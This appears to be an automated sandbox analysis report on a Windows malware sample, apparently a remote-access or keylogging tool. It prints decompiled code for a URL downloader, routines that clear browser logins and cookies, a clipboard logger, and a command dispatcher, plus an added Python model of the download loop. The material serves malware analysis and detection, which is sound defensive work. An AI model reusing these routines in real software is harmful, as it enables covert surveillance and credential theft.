                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                  • SystemParametersInfoW.USER32 ref: 00413580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 3561681748-3576401099
                                  • Opcode ID: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                  • Opcode Fuzzy Hash: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
                                  				void* _v8;
                                  				char* _v12;
                                  				void* _v16;
                                  				void _v10016;
                                  				void* _t35;
                                  				void* _t36;
                                  				void* _t42;
                                  				void* _t44;
                                  				void* _t46;
                                  				unsigned int* _t55;
                                  				signed int _t57;
                                  				signed int _t58;
                                  				signed int _t64;
                                  				signed int _t74;
                                  				char* _t98;
                                  				void* _t100;
                                  				void* _t101;
                                  				void* _t102;
                                  				void* _t103;
                                  
                                  				E00413ED0(0x271c, __ecx);
                                  				_t55 = _a12;
                                  				_a15 = _a15 & 0x00000000;
                                  				_t98 = 0;
                                  				 *_a8 = 0;
                                  				 *_t55 = 0;
                                  				_t35 = InternetOpenA("user", 1, 0, 0, 0);
                                  				_v16 = _t35;
                                  				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
                                  				_v8 = _t36;
                                  				if(_t36 != 0) {
                                  					_a12 = 0;
                                  					_a4 = 0;
                                  					while(1) {
                                  						_t10 =  &_a12; // 0x415664
                                  						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
                                  						if(_t42 != 0 && _a12 <= _t98) {
                                  							break;
                                  						}
                                  						_t44 =  *_t55 + _a12;
                                  						_push(_t44);
                                  						L00413E84();
                                  						_t57 =  *_t55;
                                  						_t100 = _a4;
                                  						_t58 = _t57 >> 2;
                                  						_v12 = memcpy(_t44, _t100, _t58 << 2);
                                  						_push(_a4);
                                  						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
                                  						_t101 =  &_v10016;
                                  						_t64 = _a12 >> 2;
                                  						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
                                  						_t103 = _t103 + 0x30;
                                  						L00413EBE();
                                  						_a4 = _v12;
                                  						 *_t55 =  *_t55 + _a12;
                                  						_t98 = 0;
                                  					}
                                  					_push( *_t55);
                                  					L00413E84();
                                  					_t102 = _a4;
                                  					 *_a8 = _t42;
                                  					_t74 =  *_t55 >> 2;
                                  					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
                                  					_a15 = 1;
                                  				}
                                  				InternetCloseHandle(_v16);
                                  				InternetCloseHandle(_v8);
                                  				return _a15;
                                  			}

Addresses (one per decompiled line above): 0x0041255b 0x00412564 0x00412568 0x0041256c 0x00412573 0x0041257a 0x0041257c 0x0041258d 0x00412591 0x00412599 0x0041259c 0x004125a3 0x004125a6 0x004125a9 0x004125a9 0x004125bc 0x004125c4 0x00000000 0x00000000 0x004125cd 0x004125d0 0x004125d1 0x004125d6 0x004125d8 0x004125df 0x004125e6 0x004125ec 0x004125ef 0x004125fa 0x00412600 0x0041260a 0x0041260a 0x0041260c 0x00412615 0x0041261b 0x0041261e 0x0041261e 0x00412622 0x00412624 0x0041262a 0x00412632 0x00412638 0x00412642 0x00412644 0x00412648 0x00412652 0x00412657 0x0041265f

                                  APIs
                                  • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                  • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                  • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                  • InternetCloseHandle.WININET(?), ref: 00412652
                                  • InternetCloseHandle.WININET(00000000), ref: 00412657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                  • String ID: dVA$user
                                  • API String ID: 3314639739-756348157
                                  • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                  • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%
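E00412553 is the sample's download primitive: InternetOpenA with the user agent "user", InternetOpenUrlA on the caller's URL, then InternetReadFile into a 10000-byte (0x2710) stack buffer, growing a heap copy with one allocation and two memcpy calls per chunk until a read succeeds with zero bytes. Note that the decompiled exit test, `if(_t42 != 0 && _a12 <= _t98) break;` with _t98 == 0, only leaves the loop on a successful zero-length read; a failing InternetReadFile does not stop it. The Python below is an added example, not code from the report or from the sample, that models that accumulation loop with the network replaced by an iterator of (ok, data) pairs so the exit condition can be exercised offline, alongside a variant that also stops on failure. The WinINet calls themselves are not reproduced, and the sample reads are constructed.

```python
"""Model of the chunk-accumulation loop in E00412553 (added example)."""
from typing import Iterable, Iterator, Optional, Tuple

CHUNK = 0x2710        # InternetReadFile buffer size used by the sample
USER_AGENT = "user"   # literal the sample passes to InternetOpenA


def _read(it: Iterator[Tuple[bool, bytes]]) -> Tuple[bool, bytes]:
    """Once the source is exhausted, behave like a successful zero-length
    read, which is how InternetReadFile reports end of data."""
    return next(it, (True, b""))


def download_as_decompiled(reads: Iterable[Tuple[bool, bytes]]) -> bytes:
    """Faithful loop: the only exit is `ok and bytes_read == 0`.
    A failed read (ok == False) is not an exit; the sample appends the
    reported count (zero for a failed call) and calls read again, so a
    source that fails forever keeps this loop spinning."""
    it = iter(reads)
    buf = b""           # stands in for the heap buffer grown with new/memcpy
    while True:
        ok, data = _read(it)
        if ok and len(data) <= 0:
            break
        buf += data[:CHUNK]
    return buf


def download_hardened(reads: Iterable[Tuple[bool, bytes]]) -> Optional[bytes]:
    """Same accumulation, but a failed read aborts instead of being retried;
    returns None on failure and the full body on a clean end of stream."""
    it = iter(reads)
    buf = bytearray()
    while True:
        ok, data = _read(it)
        if not ok:
            return None
        if len(data) == 0:
            return bytes(buf)
        buf += data[:CHUNK]


# Constructed read sequence: two chunks, one transient failure, end of stream.
SAMPLE_READS = [
    (True, b"MZ" + b"\x90" * 98),
    (False, b""),
    (True, b"PE\x00\x00"),
    (True, b""),
]
```

The faithful version silently skips the failed read and returns a body with no indication that a chunk may be missing; the hardened version surfaces the failure to the caller.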

                                  C-Code - Quality: 57%
                                  			E004078BB(void* __ecx) {
                                  				signed int _v5;
                                  				signed int _v6;
                                  				signed int _v7;
                                  				signed int _v8;
                                  				void* _t40;
                                  				void* _t44;
                                  
                                  				_push(__ecx);
                                  				 *0x41b9b8 = 1;
                                  				Sleep( *0x41b9b4);
                                  				_v5 = _v5 & 0x00000000;
                                  				_v6 = _v6 & 0x00000000;
                                  				_v7 = _v7 & 0x00000000;
                                  				_v8 = _v8 & 0x00000000;
                                  				_t44 = 0;
                                  				do {
                                  					if(_v5 == 0) {
                                  						L2:
                                  						_v5 = E00407767();
                                  					}
                                  					if(_v6 == 0) {
                                  						_v6 = E0040751B();
                                  					}
                                  					if(_v8 == 0) {
                                  						_v8 = E0040728F();
                                  					}
                                  					if(_v7 == 0) {
                                  						_v7 = E004071CF();
                                  					}
                                  					if(_t44 == 0) {
                                  						_t44 = E0040710F();
                                  					}
                                  					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
                                  						Sleep(0x1388);
                                  					}
                                  					if(_v5 == 0) {
                                  						goto L2;
                                  					}
                                  				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E00407A90("\n[Cleared browsers logins and cookies.]\n");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
                                  				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
                                  				if( *0x41b9b0 != 0) {
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					E0040B829(0x80000001, _t40, "FR", 1);
                                  				}
                                  				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
                                  				return 0;
                                  			}


Addresses (one per decompiled line above): 0x004078be 0x004078cd 0x004078d4 0x004078d6 0x004078da 0x004078de 0x004078e2 0x004078e6 0x004078e8 0x004078ec 0x004078ee 0x004078f3 0x004078f3 0x004078fa 0x00407901 0x00407901 0x00407908 0x0040790f 0x0040790f 0x00407916 0x0040791d 0x0040791d 0x00407922 0x00407929 0x00407929 0x0040792f 0x0040794c 0x0040794c 0x00407952 0x00000000 0x00000000 0x00407954 0x0040797c 0x00407982 0x00407992 0x004079a6 0x004079ac 0x004079bf 0x004079cf 0x004079db 0x004079e9 0x004079f5 0x004079fa 0x004079fd 0x00407a09

                                  APIs
                                  • Sleep.KERNEL32 ref: 004078D4
                                  • Sleep.KERNEL32(00001388), ref: 0040794C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                    • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                    • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                    • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                    • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  • [Cleared browsers logins and cookies.], xrefs: 00407977
                                  • Cleared browsers logins and cookies., xrefs: 0040798D
                                  • [INFO], xrefs: 004079A1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                  • API String ID: 3797260644-945983296
                                  • Opcode ID: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                  • Opcode Fuzzy Hash: 369653c07c44033f8c78b9710eaf8dde3d201190c08debfa228cc0d3496692d7
                                  • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 29%
                                  			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v20;
                                  				char _v36;
                                  				void* _t19;
                                  				void* _t20;
                                  				void* _t21;
                                  				intOrPtr _t24;
                                  				char* _t29;
                                  				void* _t38;
                                  				intOrPtr _t49;
                                  				void* _t50;
                                  				void* _t53;
                                  
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t49 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t53 = _t50 + 0x24;
                                  				_t19 = _t49 - 0x42;
                                  				if(_t19 == 0) {
                                  					_t20 = E0040180C( &_v20, __eflags, 0);
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t21 = E00406DD9(_t20);
                                  					__eflags = _t21;
                                  					_pop(_t38);
                                  					if(_t21 != 0) {
                                  						_t24 = E00407033(_t21, "FunFunc");
                                  						_push(_t38);
                                  						 *0x41ba18 = _t24;
                                  						 *0x41ba1c = 1;
                                  						E00412855(_t38, _t53, 0x41bcf8);
                                  						E004020C2(_a4, 0x6d, _t38);
                                  					}
                                  				} else {
                                  					_t56 = _t19 == 1;
                                  					if(_t19 == 1) {
                                  						_t29 = E0040180C( &_v20, _t56, 0);
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						 *0x41ba18(atoi(_t29));
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00407BAE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                  • atoi.MSVCRT ref: 00407BFC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                  • String ID: FunFunc
                                  • API String ID: 2980839617-81400306
                                  • Opcode ID: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                  • Opcode Fuzzy Hash: 918ed16dc3819f3a0a484e3af8be1ca9fa1981526b780426051a75e118bffbc7
                                  • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 31%
                                  			E00406C35(void* __ecx) {
                                  				char _v5;
                                  				char _v24;
                                  				char _v40;
                                  				char* _t13;
                                  				void* _t18;
                                  				void* _t34;
                                  
                                  				_t18 = __ecx;
                                  				if(( *0x41b8f8 & 0x00000001) == 0) {
                                  					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  					E00413E72(E00406CF4);
                                  				}
                                  				E00406BEF(_t18,  &_v24);
                                  				_t13 =  &_v24;
                                  				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
                                  				if(_t13 == 0) {
                                  					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
                                  					_t13 =  &_v24;
                                  					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
                                  					if(_t13 != 0) {
                                  						L00414176();
                                  						L00414170();
                                  						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t13;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                  • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                  Strings
                                  • [End of clipboard text], xrefs: 00406CB8
                                  • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                  • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                  • API String ID: 1191203583-3441917614
                                  • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                  • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                  • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
